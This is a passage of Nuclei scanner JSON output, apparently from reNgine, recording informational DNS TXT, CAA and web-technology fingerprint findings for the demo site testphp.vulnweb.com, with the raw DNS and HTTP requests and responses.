server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 42105\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42105\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.218773918Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 18143\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 18143\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.219083704Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 5824\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 5824\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.219555725Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 58445\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 58445\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.220026173Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 27568\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 27568\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.220607306Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 2055\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 2055\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1795\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:47.221696749Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 42017\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 42017\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.222178035Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 19988\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 19988\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.224013504Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 22035\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 22035\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.22439502Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 41691\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 41691\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.224805623Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 15122\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 15122\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.227094592Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 53888\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53888\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.227679884Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 53310\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53310\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3593\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:47.229064246Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 36627\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 36627\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:47.237461663Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" 